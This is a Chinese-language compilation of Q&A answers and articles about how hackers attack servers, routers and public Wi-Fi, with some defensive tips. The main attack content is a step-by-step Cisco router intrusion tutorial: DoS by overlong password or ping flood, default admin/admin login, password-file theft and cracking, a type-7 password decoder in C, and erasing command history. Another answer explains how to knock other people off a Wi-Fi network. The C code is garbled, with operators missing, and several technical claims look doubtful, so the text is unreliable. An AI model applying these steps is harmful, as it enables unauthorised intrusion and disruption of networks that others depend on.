黑客能否远程入侵电脑,进而劫持路由器?

步骤1

某个人或团体从专门提供黑客工具的地下网站下载现成的软件。这些软件用起来很方便，只需要选中和点击就可以了。

步骤2

他们闯入正在上网的计算机，将所下载程度的一部分移植到计算机的存储器中，黑客就可以控制计算机了。不幸的是，无数上网的计算机都缺少适当的安全保护措施来阻止这些行动。

步骤3

黑客们选择攻击目标----如eBay或者是亚马逊公司，操纵所劫持的计算机向要攻击的站点发出请求信息，如果同时向这些站点发送足够数量的消息，就会导致网络阻塞，或者使计算机服务器和路由器系统无法使用。

步骤4

追查攻击者会非常困难，因为他们使用了伪造的地址。但是系统管理员如果仔细审查网络上的通信情况，他们就能够确认总地址。在确认了被用来进行攻击的计算机后，受到攻击的公司就可以编制程度以过滤掉这些访问请求

黑客是怎么入侵攻击服务器的

 攻击的方法和手段

（1） 寻找目标，获取信息。有明确的攻击目标。寻找有漏洞的机器，发现之后进行攻击。即一种是先有目标，另外一种是先有工具。一般来说，如“蠕虫事件”，更多地属于后一种。病毒和黑客的融合，使攻击自动化是目前比较流行的趋势。很多问题，过去的手工病毒，要繁殖生存，通过传播删除数据。黑客在发现“后门”后，利用这些病毒手段进行攻击。扫描是常用的寻找漏洞的手段。那么，哪些服务必须提供，哪些服务不需要提供，例如用户所不需要的某些功能服务作为选项在安装时会存在在系统中，这样就可能有漏洞存在在系统中。因此，如果接受的服务越多，就可能存在的问题越多。因此，不透明、经常变化、不定期升级、动态口令，使系统在变化中变得相对安全。目前，很多情况下，用户对自己的系统中的漏洞并不了解，某些先天不合理的缺陷存在在系统中，如果有人攻击这个弱点，就成为问题。所以，第一，要首先了解自己的系统。版本信息也是重要的，不同的版本，有不同的弱点，就可能成为攻击对象。系统的关键文件也是重要的，可以从中提取用户名和口令。

（2） 获取系统敏感文件的方法。匿名FTP、TFTP等。采用TFTP在很多蠕虫、强力攻击弱口令等手段中进行使用。

（3） 获取初始访问权限。如采用监听手段窃取口令。匿名FTP，利用主机间的缺省口令或信任关系（口令）等。利用发邮件，告诉你附件是个升级包，但有可能是一个病毒。利用技术防范上的漏洞。

（4） 获取超级用户口令。如SNIFER、缓冲区溢出等手段获取特权。目前的开发安全理论已经引起重视。软件工程与软件安全已经成为一个并行的方式。软件越庞大，漏洞越多。目前国内有人发现MICROSOFT有6个漏洞，据说这次发现之后直接就在网上公布了，但微软还没有找到相应的解决办法。所以给用户带来很大的风险。

（5） 消除痕迹。破坏系统后使用。

（6） 惯用手法。TFTP、拒绝服务（分布式拒绝服务）、SNIFFER嗅探器、缓冲区溢出、SYN同步风暴（发出大量的连接请求，但并不管连接结果，大量占用用户资源，出现死机。）目前有一种技术，使系统的资源只能用到60%等。采用路由器设置提高网络质量。但是对于公共系统，路由配置拒绝服务比较难。对于路由器的攻击，窃取权限修改路由表，或者造成资源DOWN机。因此，要经常检查路由器的状态。采取措施之前，应该先记录原始状态参数，不要轻易地重启技术。

--------------------------

如何预防黑客

（1） 升级系统，打补丁

（2） 防火墙

（3） 使用入侵扫描工具

（4） 不要轻易安装不明软件

（5） 经常检查日志

如果是服务器受到DDOS攻击，可以通过选择带防御的高防服务器预防。希望英虎网络的回答能够帮到您！

如何攻击一个无线路由？

1、最好的方法是使用无线干扰器。（你睡一会儿悄悄打开）

2、登录进路由器修改DHCP服务设置，把地址过期时间修改到最短，如1小时，然后每隔一小时，他们的电脑都需要重新获取IP，也就是会断网一瞬间。他们的电脑不会是同时开机的，所以断网那一瞬间也不会是同时的。

3、修改WAN口参数，选择按需连接，保持默认的15分钟就可以了，这样基本上每隔15分钟就需要重新连接一次网络，也会达到经常掉线的目的。

其中的第2、3点可以同时使用。

你使用手机登录路由器，先导出一次原始设置，并保存在手机上的一个文件夹内名称为1，然后设置2、3点后再导出一次名称为2。以后只需要导入不同的设置就可以达到快速修改路由器设置的目的。

也不知道这些方法具体效果怎么样，你可以试试看。

如何攻击路由器

不要用这破坏cisco系统，或非法访问系统。这篇文章只是以学习为目的。只可以用在合法行为，不能破坏

任何系统。这篇文章将一步一步的向你展示如何利用发现的缺陷来获得非法访问。如果你攻入了一个cisco

路由器，或者扰乱了系统，将会中断数百个网络客户机，造成大量损失。所以，只可以在被允许的情况下

进行，否则你将会有许多麻烦！

----------------------------------

目录:

----------------------------------

在你看之前需要了解的:

－什么是IP地址？

－什么是ISP？

－什么是TCP/IP数据包？

－怎样隐藏你的IP地址？

－怎样使用Telnet？

－怎样使用HyperTerminal？

－怎样使用Ping？

－怎样使用TraceRoute？

－怎样使用代理服务器？

-------------------------------------

－第一段：为什么攻击cisco路由器？

－第二段：怎样找到一个cisco路由器？

－第三段：怎样闯入一个cisco路由器？

－第四段：怎样破解密码？

－第五段：怎样使用一个cisco路由器？

----------------------

你看之前需要了解的知识：

----------------------

什么是IP地址？

IP是Internet Protocol的缩写,电脑通过IP地址来识别网络中的其它电脑，与其连接。这就是你为什么会

在IRC中被踢走，并且找到你的ISP和你的大概位置。IP地址是很容易得到的，基本上可以由以下几种方法

获得：

-你访问某网站,你的IP被记录

-在IRC中,某人得到你的IP地址

-在ICQ，OICQ中,可以简单的得到你的IP地址，使用一些小工具。

-如果你的电脑和某人连接起来，运行 systat即可看到和那些电脑连接（以IP地址显示）

-某人发给你一封用java程序写的邮件，可以得到你的IP地址

还有其它许多方法得到IP地址，包括使用一些木马和后门程序。

-----------

什么是ISP？

ISP是Internet Service Provider的缩写,你通过它们连接到internet.你拨号后就会连接和其连接。我

们可以运行一个traceroute（跟踪路径）来寻找我们的ISP（traceroute 在后面还会介绍).

你应该看到像这样:

tracert 222.222.22.22

Tracing route to [221.223.24.54]

over a maximum of 30 hops.

1 147ms 122ms 132ms your.isp [222.222.22.21]你的ISP

2 122ms 143ms 123ms isp.firewall [222.222.22.20] 3 156ms 142MS 122ms aol.com [207.22.44.33]

4 * * * Request timed out

5 101ms 102ms 133ms cisco.router [194.33.44.33] 6 233ms 143ms 102ms something.ip [111.11.11.11]

7 222ms 123ms 213ms netcom.com [122.11.21.21]

8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]

9 122ms 223ms 243ms altavista.34.com [121.22.32.43] 目标的ISP

10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]

Trace complete.

------------------

什么是TCP/IP数据包？

TCP/IP是 Transmission Control Protocol 和 Internet Protocol的缩写, 一个TCP/IP数据包就是

压缩过的数据包，将发送到另外一台电脑的。这就是网络数据传送的方式，通过发送数据包。数据包的头

部包括发送数据包的机器的IP地址。你可以重写数据包，并且表面上是来自其它的人！！你可以通过这非

法访问许多系统而不会被发现。当然，你需要在Linux上运行或使用某软件来完成这项工作。这篇教程不会

向你介绍怎样在一个cisco路由器上这样做，但是当攻击某些系统这样做是非常方便的。如果你试着攻击某

些系统，但是无法入手，你总是可以这样试...

------------------

怎样隐藏你的IP地址？

使用Genius 2 或 DC IS之类的软件，你将可以运行IdentD。你就可以随时改变你的IP地址。当你在IRC中

被踢出来的时候，你使用它可以再次进入。你访问其它系统的时候，你也可以使用它，那么记录下来的就是

错误的IP地址...

-------------

怎样使用telnet？

你可以用开始菜单中的“运行”，输入telnet，接着确定。

你就运行了telnet，你可以改变一些选项点击：TerminalPreferences。你可以在这改变缓冲区的大小。

你也可以 打开/关闭 "local echo"。如果你打开了"local echo"，你的电脑将显示你输入的任何东西，

并且连接上的电脑将显示回应。

所以你将会看到就像这些：

你输入 "hello",你看到的是

hhelelollo

这是因为返回的信息和你输入的内容已经混合起来了。我这样做的唯一的原因是看连接的机器对我的输入，

是否产生回应。

在默认的情况下，telnet只会通过telnet端口连接，即是断口23。你并不会只通过端口23连接，所以你连

接的时候，你可以任意改变端口。你可以改成25，那是邮件服务程序的端口。也可以是21，那是ftp的端口。

总共有上千个端口，所以你要选择正确的端口！

----------------------

怎样使用超级终端？

超级终端可以让你的电脑的任意端口进行监听某台电脑，如果有信息来到这个端口，就可以进行传输件。超

级终端在 开始程序附件通讯 中，没有的话，你可以通过控制面板中安装。首先，你要选择连接协议，我

们选"TCP/IP Winsock"，接着输入要连接的电脑，下面选择端口。可以选择CallWait for Call，来等待

文件。这样其它的电脑就可以通过某个端口连接上你了，你也可以聊天，或者传送文件了。

------------

怎样使用Ping？

Ping的使用很简单，在MS-DOS方式下，输入“ping IP地址”，默认是ping三次，你也可以自己设定。

"ping ip地址 -t"

可以使其不停的ping。

改变 ping 的大小可以这样做:

"ping -l (size) ip.address"

ping其实是向远程的机器发送数据包，远程的机器接收到就会把数据包原路返回，我们可以看到这个过程的

时间。时间越短，速度就越快，当然，拥挤的时候，就会发生数据包丢失。 Ping 会减慢被ping的电脑的速

度，流量过大的时候，甚至使其down机。一分钟的ping攻击就可以使一台win98的电脑崩溃。(因为它的连接

缓冲区溢出 - 连接过量，所以Windows决定休息休息了:).ping攻击也会占用你许多带宽，所以你的带宽要

比目标机器大(除非目标机器运行的是Windows 98，而且你有个不错的猫，那么一分钟内，你就可以叫它下台).

Ping攻击对强壮的系统没有效果。

注意: DOS's -t 选项不是一个ping攻击,它只是很小的连接一下，而且中间有很多间隔。在Unix或Linux

的机器中，你可以用上参数 －f 进行真正的ping攻击。其实，如果你的分布是POSIX-compliant (POSIX -

Portable Operating System Interface based on uniX)，否则那就不是真正的Unix/Linux 分布。那

么如果你有个 OS，称自己既是Unix，又是Linux，那么就是有 －f 。

------------------

怎样使用TraceRoute？

要跟踪你的连接（可以观察到目标机器的连接路线），只要在MS-DOS方式下，输入“tracert IP地址”。你

将会看到一个电脑的目录，就是你和目标之间通过的机器。.

你可以用此方法确定是否存在防火墙，也可以确定某人的ISP(internet service provider)。

要确定ISP，只要看目标机器的前一个IP地址，那就应该是ISP的路由器。

基本上说，这就是traceroute怎样工作－一个 TCP/IP 数据包，在它的头部有一个值(在IP的头部。如果你不

知道这是什么意思，没关系，你接着往下看就可以了)称作 TTL,它是Time To Live的缩写。当一个数据包通过

路由器的时候，它的TTL值就会减少。这样可能会使数据包在网络中流窜，消耗带宽。所以每当一个数据包TTL

值达到0的时候，它就会失效并且因为一个ICMP错误返回到发送者。现在traceroute 先发送一个TTL值为1的

数据包，那么它很快就会返回。查看ICMP错误的头部，traceroute就可以知道数据包第一步通过哪。接着就

会发送TTL值为2的数据包，返回后，就是第二次通过的地方。依次下去，直到最终的目的地，就可以知道整个

路径。

现在你是不是明白了呢? :-)

------------------

怎样使用代理服务器？

在网上寻找一个代理服务器，包括你需要的打开的端口的代理服务器。找到后，你可以用telnet 或

hyperterminal通过代理服务器连接到另外一台电脑上。这样做对方的电脑就不可以确定你的IP地址。

-----------------------------

第一段：为什么攻击cisco路由器？

你可能会想.. 为什么要攻击 cisco 路由器呢?

答案就是那样做将对闯入其它的系统非常有用...

Cisco路由器非常的快，在一个系统中，一些会是以18 T1连接。而且它们非常灵活，尽管大多数运行

telnet，但是它们可以在DoS攻击或攻入其它系统时发挥作用。

它们同时还会有成千的数据包通过。但是可以被捕获进行译码...许多的cisco路由器受托于系统，它们

可以让你获得其网络中访问其它电脑的确切的数量。

------------------------------

第二段：怎样找到一个cisco路由器？

寻找一个cisco路由器可以说是以项简单的任务，几乎所有的ISP至少通过一个cisco路由器。最简单的

方法是在dos下运行tracert，你可以跟踪到电脑之间的许多电脑，在这之间，必有一个 “cisco”这个

名字。如果你发现了，记下它的IP地址。

看哪个开2001端口（Cisco路由器管理）和23端口即是的啦！

现在，你有cisco路由器的位置了，但是它可能还有一个防火墙保护它，所以你要检查一下它是否被封

锁ping连接的次数，如果有回应，它就有可能未被封锁。另外一种方法就是试着访问cisco路由器的一些

端口。你用telnet即可，端口23，如果它要输入密码，未叫输入用

户名，你就可能在一个防火墙。

试着找一个未受防火墙保护的路由器，因为这篇教程主题是路由器，不是教你怎样通过防火墙。当你确

信找到一个好的系统，你应该找一个可以使用23端口的代理服务器，这样你的IP地址就不会被路由器记

录下来了。

---------------------------------

第三段：怎样闯入一个cisco路由器？

Cisco路由器运行 V4.1 版本的软件（现在普遍使用的），这很容易干掉。你只要通过代理服务器连接到

一个cisco路由器，输入一串很长的密码，如：

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

现在开始等，cisco系统将会重新启动，可以说你已经攻击它，使它离线了...但是过2-10分钟，它就会

恢复，我们应该进入它。

如果什么都没发生,那么它运行的不是脆弱的软件,你可以多试几种DoS攻击，比如大量的 ping.到dos下，

输入 "ping -l 56550 cisco.router.ip -t",这会起到同样的效果.

可以使其down机。一定要注意小心啊！我相信你应该知道该怎么保护自己。

如果它被动结,就另找一个代理服务器进行连接。并且用户名为"admin"，密码为"admin"，因为这是默认的。

因为当它暂时的disabled，它将恢复到默认状态。

现在，你已经进入了，你应该获得密码文件！系统运行不同的软件，但大部分有个像"htl-textil"

这类的提示，现在输入"?"，观看命。你会看到有很多的命令，你会发现一个传送命令，用这个命令，在当前

Admin用户的情况下，把密码文件发送到你的电脑23端口上。但是在这之前，你要把你的超级终端设定好。你发

送文件之后，超级终端将问你是否接收文件，你选择是并保存在电脑中即可。离线.

你通过了最难的部分，下面准备开始破解密码。

--------------------

第四段：怎样破解密码？

现在，你获得了密码文件，你要破解它才能继续进入路由器。所以你可以运行John the Ripper之类的软件破

译它。

这是我推荐的最简单的方法.另一种方法是试着把它解码。这样做需要一个解码软件，使用某些解码软件，你还

要有足够的耐心。

这儿有一个专门为cisco路由器密码文件解码的软件，你可以在Linux中编译它:

#include #include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) 1)

return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))

return(-1);

for (i = 2 ; i = strlen(enc_pw); i++) {

if(i !=2 !(i 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - '0';

continue;

}

if(enc_pw[i] = 'A' enc_pw[i] = 'F') {

val += enc_pw[i] - 'A' + 10;

continue;

}

if(strlen(enc_pw) != i)

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p fprintf(stdout, " %s

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc 1)

{

if(argc 3) {

usage();

exit(1);

}

if(argv[1][0] == '-')

{

switch(argv[1][1]) {

case 'h':

usage();

break;

case 'p':

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n", passwd);

break;

default:

fprintf(stderr, "%s: unknow option.", pname);

}

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

}

if(line[i] == '\r')

i--;

if(line[i] == '\n')

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

}

}

如果你没有使用Linux，你就只好用John the Ripper之类的软件，带上密码档，进行暴利破解。

-------------------------------

第五段：怎样使用一个cisco路由器？

要使用它，你先必须连接到它，你可以用代理，以免你的IP地址被记下。当你进入的时候，如果你想关闭

历史记录来掩盖你的行为，你只要输入"terminal history size 0"。这样就不会被记下什么了! 输入 "?"

来看路由器中的命令，大多数你都可以用的。

这些路由器一般都有telnet，所以你可以通过telnet连接到其它的系统上(比如unix boxes)，并且攻击

它们。你还可以使用ping 和 traceroute 进行跟踪系统或进行DoS攻击。你也可以监听数据包，但我不推荐

这样做，因为并不是一定成功，而且会被发现....

---------------------------------

如果你第一次没有攻入cisco，不要担心...你一两次是不可能成功的。它需要不断的练习和超强的耐力。

这儿只向你将怎样做...一定要在合法的情况下进行啊！

黑客攻击主要有哪些手段？

黑客主要运用手段和攻击方法

2004-12-02 来源: 责编: 滴滴 作者:

编者按：

不可否认,网络已经溶入到了我们的日常工作和生活中。因此，在我们使用电脑时就得时时考虑被网络攻击的防范工作。俗语说“知己知彼，百战不贻”，要想尽量的免遭黑客的攻击，当然就得对它的主要手段和攻击方法作一些了解。闲话少说，咱这就入正题！

戴尔笔记本本周限时优惠 免费咨询800-858-2336

来源：黑客基地

不可否认,网络已经溶入到了我们的日常工作和生活中。因此，在我们使用电脑时就得时时考虑被网络攻击的防范工作。俗语说“知己知彼，百战不贻”，要想尽量的免遭黑客的攻击，当然就得对它的主要手段和攻击方法作一些了解。闲话少说，咱这就入正题！

（一）黑客常用手段

1、网络扫描--在Internet上进行广泛搜索，以找出特定计算机或软件中的弱点。

2、网络嗅探程序--偷偷查看通过Internet的数据包，以捕获口令或全部内容。通过安装侦听器程序来监视网络数据流，从而获取连接网络系统时用户键入的用户名和口令。

3、拒绝服务 -通过反复向某个Web站点的设备发送过多的信息请求，黑客可以有效地堵塞该站点上的系统，导致无法完成应有的网络服务项目(例如电子邮件系统或联机功能)，称为“拒绝服务”问题。

4、欺骗用户--伪造电子邮件地址或Web页地址，从用户处骗得口令、信用卡号码等。欺骗是用来骗取目标系统，使之认为信息是来自或发向其所相信的人的过程。欺骗可在IP层及之上发生（地址解析欺骗、IP源地址欺骗、电子邮件欺骗等）。当一台主机的IP地址假定为有效，并为Tcp和Udp服务所相信。利用IP地址的源路由，一个攻击者的主机可以被伪装成一个被信任的主机或客户。

5、特洛伊木马--一种用户察觉不到的程序，其中含有可利用一些软件中已知弱点的指令。

6、后门--为防原来的进入点被探测到，留几个隐藏的路径以方便再次进入。

7、恶意小程序--微型程序，修改硬盘上的文件，发送虚假电子邮件或窃取口令。

8、竞争拨号程序--能自动拨成千上万个电话号码以寻找进入调制解调器连接的路径。逻辑炸弹计算机程序中的一条指令，能触发恶意操作。

9、缓冲器溢出-- 向计算机内存缓冲器发送过多的数据，以摧毁计算机控制系统或获得计算机控制权。

10、口令破译--用软件猜出口令。通常的做法是通过监视通信信道上的口令数据包，破解口令的加密形式。

11、社交工程--与公司雇员谈话，套出有价值的信息。

12、垃圾桶潜水--仔细检查公司的垃圾，以发现能帮助进入公司计算机的信息。

（二）黑客攻击的方法：

1、隐藏黑客的位置

典型的黑客会使用如下技术隐藏他们真实的IP地址:

利用被侵入的主机作为跳板;

在安装Windows 的计算机内利用Wingate 软件作为跳板;利用配置不当的Proxy作为跳板。

更老练的黑客会使用电话转接技术隐蔽自己。他们常用的手法有:利用800 号电话的私人转接服务联接ISP, 然后再盗用他人的账号上网;通过电话联接一台主机,再经由主机进入Internet。

使用这种在电话网络上的"三级跳"方式进入Internet 特别难于跟踪。理论上,黑客可能来自世界任何一个角落。如果黑客使用800号拨号上网,他更不用担心上网费用。

2、网络探测和资料收集

黑客利用以下的手段得知位于内部网和外部网的主机名。

使用nslookup 程序的ls命令;

通过访问公司主页找到其他主机;

阅读FTP服务器上的文挡;

联接至mailserver 并发送 expn请求;

Finger 外部主机上的用户名。

在寻找漏洞之前,黑客会试图搜集足够的信息以勾勒出整个网络的布局。利用上述操作得到的信息,黑客很容易列出所有的主机,并猜测它们之间的关系。

3、找出被信任的主机

黑客总是寻找那些被信任的主机。这些主机可能是管理员使用的机器,或是一台被认为是很安全的服务器。

一步,他会检查所有运行nfsd或mountd的主机的NFS输出。往往这些主机的一些关键目录(如/usr/bin、/etc和/home)可以被那台被信任的主机mount。

Finger daemon 也可以被用来寻找被信任的主机和用户,因为用户经常从某台特定的主机上登录。

黑客还会检查其他方式的信任关系。比如,他可以利用CGI 的漏洞,读取/etc/hosts.allow 文件等等。

分析完上述的各种检查结果,就可以大致了解主机间的信任关系。下一步, 就是探测这些被信任的主机哪些存在漏洞,可以被远程侵入。

4、找出有漏洞的网络成员

当黑客得到公司内外部主机的清单后,他就可以用一些Linux 扫描器程序寻找这些主机的漏洞。黑客一般寻找网络速度很快的Linux 主机运行这些扫描程序。

所有这些扫描程序都会进行下列检查:

TCP 端口扫描;

RPC 服务列表;

NFS 输出列表;

共享(如samba、netbiox)列表;

缺省账号检查;

Sendmail、IMAP、POP3、RPC status 和RPC mountd 有缺陷版本检测。

进行完这些扫描,黑客对哪些主机有机可乘已胸有成竹了。

如果路由器兼容SNMP协议,有经验的黑客还会采用攻击性的SNMP 扫描程序进行尝试, 或者使用"蛮力式"程序去猜测这些设备的公共和私有community strings。

5、利用漏洞

现在,黑客找到了所有被信任的外部主机,也已经找到了外部主机所有可能存在的漏洞。下一步就该开始动手入侵主机了。

黑客会选择一台被信任的外部主机进行尝试。一旦成功侵入,黑客将从这里出发,设法进入公司内部的网络。但这种方法是否成功要看公司内部主机和外部主机间的过滤策略了。攻击外部主机时,黑客一般是运行某个程序,利用外部主机上运行的有漏洞的daemon窃取控制权。有漏洞的daemon包括Sendmail、IMAP、POP3各个漏洞的版本,以及RPC服务中诸如statd、mountd、pcnfsd等。有时,那些攻击程序必须在与被攻击主机相同的平台上进行编译。

6、获得控制权

黑客利用daemon的漏洞进入系统后会做两件事:清除记录和留下后门。

他会安装一些后门程序,以便以后可以不被察觉地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用,甚至于新文件的大小都和原有文件一样。黑客一般会使用rcp 传递这些文件,以便不留下FTP记录。

一旦确认自己是安全的,黑客就开始侵袭公司的整个内部网

7．窃取网络资源和特权

黑客找到攻击目标后,会继续下一步的攻击,步骤如下:

（1）下载敏感信息

如果黑客的目的是从某机构内部的FTP或WWW服务器上下载敏感信息,他可以利用已经被侵入的某台外部主机轻而易举地得到这些资料。

（2）攻击其他被信任的主机和网络

大多数的黑客仅仅为了探测内部网上的主机并取得控制权,只有那些"雄心勃勃"的黑客,为了控制整个网络才会安装特洛伊木马和后门程序,并清除记录。 那些希望从关键服务器上下载数据的黑客,常常不会满足于以一种方式进入关键服务器。他们会费尽心机找出被关键服务器信任的主机,安排好几条备用通道。

（3）安装sniffers

在内部网上,黑客要想迅速获得大量的账号(包括用户名和密码),最为有效的手段是使用"sniffer" 程序。

黑客会使用上面各节提到的方法,获得系统的控制权并留下再次侵入的后门,以保证sniffer能够执行。

（4）瘫痪网络

如果黑客已经侵入了运行数据库、网络操作系统等关键应用程序的服务器,使网络瘫痪一段时间是轻而易举的事。

如果黑客已经进入了公司的内部网,他可以利用许多路由器的弱点重新启动、甚至关闭路由器。如果他们能够找到最关键的几个路由器的漏洞,则可以使公司的网络彻底瘫痪一段时间

黑客怎么入侵连接上路由器的设备

能够入侵链接路由器的设备，前提肯定是能入侵路由器了。

先拿到路由器权限之后，根据路由器上的配置能够获取此路由器分配的ip列表。

掌握局域网ip后，就可以进行端口扫描了。。。

然后就是渗透。。。

希望对你有帮助。

黑客如何攻击公共wifi？

我国公共场所免费WiFi不断增多，然而，由于免费WiFi存在路由器和网络漏洞，成为黑客攻击的对象，导致网民个人隐私泄露、网银被盗等案例时有发生。

黑客攻击公共WiFi最常用三大招式：

1.域名劫持。

在公共的WiFi环境下，进入无线路由器的管理后台，并对域名系统进行修改。当使用者输入网址时，服务器直接把IP跳到黑客设置的钓鱼网站。

2.钓鱼WiFi。

黑客往往选择在繁华商业区构建一个不加密的WiFi，并把WiFi的名字起一个众所周知的热点名称，引诱网民“上钩”。

3.ARP（地址解析协议）欺骗。

黑客和使用者同时连接了同一个WiFi，使用者开始上网浏览，黑客则在其手机上打开了一款黑客软件。该黑客软件很快就进入路由器的WEB管理界面，并将使用者的手机信息读取出来。

如何防范信息泄露：

一是不要盲目地“见网就连”，防止钓鱼的虚假WiFi。

二是不要使用公共WiFi进行网购和网银操作，避免个人信息的泄露。当用户发现账户被劫持后，应在第一时间退出账户，随后退出WiFi。如果直接退网而不先退出账户，缓存的网络数据则不会被清空，将导致黑客可以继续操控用户。